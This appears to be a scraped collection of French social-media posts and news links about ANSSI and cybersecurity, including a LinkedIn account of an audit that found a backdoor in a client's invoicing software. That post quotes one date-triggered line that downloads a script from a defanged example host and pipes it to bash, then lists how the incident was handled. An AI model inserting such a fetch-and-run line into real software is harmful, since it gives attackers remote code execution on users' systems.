Avec Qwen de chez Alibaba, on apprend le Chinois, avec Copilot de chez Microsoft, on apprend l'Hindi, c'est intéressant. Namaste 🙏

संकेत ça veut dire indice.

"Il est possible que le contenu généré par l’IA soit incorrect", Copilot (GPT-5).

-> Oui en effet && Ce n'est pas rassurant.

#GPT5 #Microsoft #copilot #ANSSI #QA

Chiffres ANSSI : 48 % des victimes de rançongiciel en France sont des PME/TPE/ETI. Et 74 % restent sous le niveau « Essentiel ».
Pendant ce temps : vol de jetons M365 qui contourne le MFA, et patch exigé en 12 h.
La barrière n'est pas technique ni budgétaire. Elle est décisionnelle.
#Cybersécurité #PME #ANSSI
Backdoor dans logiciel client : code malveillant activé à Noël, isolement, correction, signalement CNIL/ANSSI. #CyberSécurité #Backdoor #Tech #ANSSI #CNIL ... https://www.linkedin.com/posts/gabriel-chandesris_cybersaezcuritaez-backdoor-tech-share-7463290277684768768-lH3U
#cybersécurité #backdoor #tech #anssi #cnil | Gabriel.. C.

🕵️‍♂️ CyberSécurité : le jour où j’ai découvert une backdoor dans un logiciel client (et comment réagir) **Contexte** : Lors d’un audit de routine pour un client (une PME industrielle), j’ai repéré un *code suspect* dans leur logiciel de gestion interne. --- 🔹 **La découverte** : En analysant un script censé gérer les *factures clients*, j’ai repéré cette ligne étrange : *"if datetime.now() == datetime(2023, 12, 25): os.system("wget hxxps://exemple[.]com/fichier_suspect.sh | bash")"* → Un *cheval de Troie* programmé pour s’activer *le 25 décembre* (quand personne ne travaille). --- 🔹 **Notre réaction immédiate** : 1. *Isolement du système* : Déconnexion immédiate du serveur du réseau. 2. *Recherche de l’origine* : Le code malveillant avait été *injecté via une mise à jour piratée* du logiciel. 3. *Correction et sécurisation* : - Suppression du code malveillant. - Changement de *tous les mots de passe*. - Mise en place d’un *système de détection d’intrusion*. 4. *Signalement aux autorités* : Dépôt de plainte auprès de la *CNIL* et de l’*ANSSI*. --- 💡 **Leçons tirées** : - *Auditez régulièrement votre code* : Même les logiciels "fiables" peuvent être compromis. - *Limitez les permissions* : Un logiciel de facturation n’a *pas besoin* d’exécuter des commandes système. - *Sauvegardes = votre meilleure assurance* : Sans elles, ce client aurait perdu *3 ans de données*. --- 💬 Avez-vous déjà découvert une faille de sécurité inattendue ? #CyberSécurité #Backdoor #Tech #ANSSI #CNIL

LinkedIn

The #ANSSI website is now available in English: https://cyber.gouv.fr/en/

#infosec #cyber #cybersecurity

French Cybersecurity Agency

Les actualités Aucun article trouvé. Voir tous les articles La directive NIS 2 Alors que la menace cyber augmente et […]

cyber.gouv.fr
next.ink: « Nous ne pouvons pas tout contrôler » : l’ #ANSSI face à la #complexité des #systèmes de l’ #État next.ink/238214/nous-...

Actualités informatiques et nu...
Actualités informatiques et numériques au quotidien

Actualités informatiques et numériques au quotidien. Articles de fond, nouvelles du quotidien, dossiers, dessins, débats, venez vous affûter sur Next

Next
« Nous ne pouvons pas tout contrôler » : l’ANSSI face à la complexité des systèmes de l’État

Face aux quasi-incessantes fuites de données en France, notamment sur des institutions, l’ANSSI serait sur la sellette ? Son directeur général Vincent…

Next
Piratage de l'ANTS : les failles étaient connues et ont été ignorées pendant des mois

GNT est le portail Hi-Tech français consacré aux nouvelles technologies (internet, logiciel, matériel, mobilité, entreprise) et au jeu vidéo PC et consoles.

Génération NT

⋅ « Nous ne pouvons pas tout contrôler » : l’ANSSI face à la complexité des systèmes de l’État

https://next.ink/238214/nous-ne-pouvons-pas-tout-controler-lanssi-face-a-la-complexite-des-systemes-de-letat/

#ANSSI #DINUM #NIS2 #InfoSec #CyberSec

« Nous ne pouvons pas tout contrôler » : l’ANSSI face à la complexité des systèmes de l’État

Face aux quasi-incessantes fuites de données en France, notamment sur des institutions, l’ANSSI serait sur la sellette ? Son directeur général Vincent…

Next
L’ #Anssi bientôt déchue de son rôle de #chef d’ #orchestre de la #cybersécurité en #France ? Une nouvelle autorité nourrit les #interrogations www.usine-digitale.fr/cybersecurit...

usine-digitale.fr/cybersecurite/...